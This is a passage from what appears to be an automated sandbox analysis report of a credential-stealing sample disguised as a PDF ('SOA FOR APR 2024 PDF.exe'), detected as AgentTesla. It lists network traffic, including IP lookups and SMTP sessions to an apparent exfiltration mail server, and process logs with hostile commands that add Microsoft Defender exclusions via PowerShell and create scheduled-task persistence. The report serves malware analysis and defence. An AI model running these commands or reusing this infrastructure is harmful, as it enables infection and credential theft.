                                Apr 26, 2024 09:04:09.512851954 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.512877941 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.512907982 CEST49733587192.168.2.550.87.195.61
                                Apr 26, 2024 09:04:09.513397932 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514039040 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514101982 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514194012 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514236927 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514256954 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514311075 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514334917 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514422894 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514446974 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514520884 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514607906 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514619112 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514717102 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514766932 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514830112 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514867067 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514898062 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.514946938 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.533562899 CEST49735587192.168.2.550.87.195.61
                                Apr 26, 2024 09:04:09.549262047 CEST49734587192.168.2.550.87.195.61
                                Apr 26, 2024 09:04:09.708951950 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709017038 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709045887 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709144115 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709184885 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709219933 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709259033 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709274054 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709564924 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709599018 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709707975 CEST5874973350.87.195.61192.168.2.5
                                Apr 26, 2024 09:04:09.709860086 CEST5874973350.87.195.61192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 26, 2024 09:01:57.879776001 CEST6072053192.168.2.51.1.1.1
                                Apr 26, 2024 09:01:58.005095005 CEST53607201.1.1.1192.168.2.5
                                Apr 26, 2024 09:01:59.480166912 CEST6033853192.168.2.51.1.1.1
                                Apr 26, 2024 09:01:59.687926054 CEST53603381.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Apr 26, 2024 09:01:57.879776001 CEST192.168.2.51.1.1.10x76d8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                Apr 26, 2024 09:01:59.480166912 CEST192.168.2.51.1.1.10x3aadStandard query (0)mail.fascia-arch.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Apr 26, 2024 09:01:58.005095005 CEST1.1.1.1192.168.2.50x76d8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                Apr 26, 2024 09:01:58.005095005 CEST1.1.1.1192.168.2.50x76d8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                Apr 26, 2024 09:01:58.005095005 CEST1.1.1.1192.168.2.50x76d8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                Apr 26, 2024 09:01:59.687926054 CEST1.1.1.1192.168.2.50x3aadNo error (0)mail.fascia-arch.com50.87.195.61A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • api.ipify.org

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549708104.26.12.2054437384C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                TimestampBytes transferredDirectionData
                                2024-04-26 07:01:58 UTC155OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:01:58 UTC211INHTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:01:58 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b460dc454c2c-MIA
                                2024-04-26 07:01:58 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.549712104.26.12.2054437788C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                TimestampBytes transferredDirectionData
                                2024-04-26 07:02:03 UTC155OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:02:03 UTC211INHTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:02:03 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b4822ee66dcd-MIA
                                2024-04-26 07:02:03 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.549721104.26.12.2054437176C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                TimestampBytes transferredDirectionData
                                2024-04-26 07:02:13 UTC155OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:02:14 UTC211INHTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:02:13 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b4c0ec08b3e9-MIA
                                2024-04-26 07:02:14 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.549723104.26.12.2054437364C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                TimestampBytes transferredDirectionData
                                2024-04-26 07:02:21 UTC155OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:02:22 UTC211INHTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:02:22 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b4f43f602878-MIA
                                2024-04-26 07:02:22 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                SMTP Packets

                                TimestampSource PortDest PortSource IPDest IPCommands
                                Apr 26, 2024 09:02:00.184763908 CEST5874971150.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:00 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:00.186783075 CEST49711587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:02:00.383451939 CEST5874971150.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:00.383615017 CEST49711587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:02:00.581645012 CEST5874971150.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:02:04.995862961 CEST5874971350.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:04 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:04.996057987 CEST49713587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:02:05.192907095 CEST5874971350.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:05.193202019 CEST49713587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:02:05.394184113 CEST5874971350.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:02:15.062194109 CEST5874972250.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:14 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:15.062402010 CEST49722587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:02:15.259160995 CEST5874972250.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:15.259377003 CEST49722587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:02:15.457284927 CEST5874972250.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:02:23.580065966 CEST5874972450.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:23 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:23.580344915 CEST49724587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:02:23.776743889 CEST5874972450.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:23.776953936 CEST49724587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:02:23.974812031 CEST5874972450.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:03:38.543343067 CEST5874972850.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:38 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:38.543483973 CEST49728587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:03:38.624387026 CEST5874972950.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:38 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:38.624552965 CEST49729587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:03:38.739939928 CEST5874972850.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:38.740134001 CEST49728587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:03:38.820370913 CEST5874972950.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:38.820543051 CEST49729587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:03:38.937556982 CEST5874972850.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:03:39.018364906 CEST5874972950.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:03:46.414268017 CEST5874973050.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:46 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:46.414396048 CEST49730587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:03:46.611557007 CEST5874973050.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:46.611768961 CEST49730587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:03:46.809900045 CEST5874973050.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:03:51.537533998 CEST5874973150.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:51 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:51.537756920 CEST49731587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:03:51.734724998 CEST5874973150.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:51.734898090 CEST49731587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:03:51.936153889 CEST5874973150.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:03:56.566600084 CEST5874973250.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:56 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:56.566752911 CEST49732587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:03:56.763576031 CEST5874973250.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:56.763776064 CEST49732587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:03:56.961771011 CEST5874973250.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:04:06.202986956 CEST5874973350.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:04:06 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:04:06.204030991 CEST49733587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:04:06.705445051 CEST49733587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:04:07.038124084 CEST5874973350.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:04:07.038494110 CEST49733587192.168.2.550.87.195.61STARTTLS
                                Apr 26, 2024 09:04:07.237658024 CEST5874973350.87.195.61192.168.2.5220 TLS go ahead
                                Apr 26, 2024 09:04:09.286659956 CEST5874973550.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:04:09 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:04:09.286797047 CEST49735587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:04:09.298635960 CEST5874973450.87.195.61192.168.2.5220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:04:09 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:04:09.298736095 CEST49734587192.168.2.550.87.195.61EHLO 035347
                                Apr 26, 2024 09:04:09.483458042 CEST5874973550.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:04:09.495381117 CEST5874973450.87.195.61192.168.2.5250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:09:01:51
                                Start date:26/04/2024
                                Path:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                                Imagebase:0x630000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071533656.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2075260613.0000000005260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                                Imagebase:0xd90000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                                Imagebase:0xd90000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:09:01:56
                                Start date:26/04/2024
                                Path:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                                Imagebase:0x640000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3282089409.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3282089409.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:10
                                Start time:09:01:57
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                Imagebase:0x90000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 45%, ReversingLabs
                                • Detection: 52%, Virustotal, Browse
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:11
                                Start time:09:01:57
                                Start date:26/04/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:09:02:01
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:09:02:01
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:09:02:01
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                                Imagebase:0x9e0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3282284281.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3282284281.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3282284281.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:15
                                Start time:09:02:06
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0xba0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 45%, ReversingLabs
                                • Detection: 52%, Virustotal, Browse
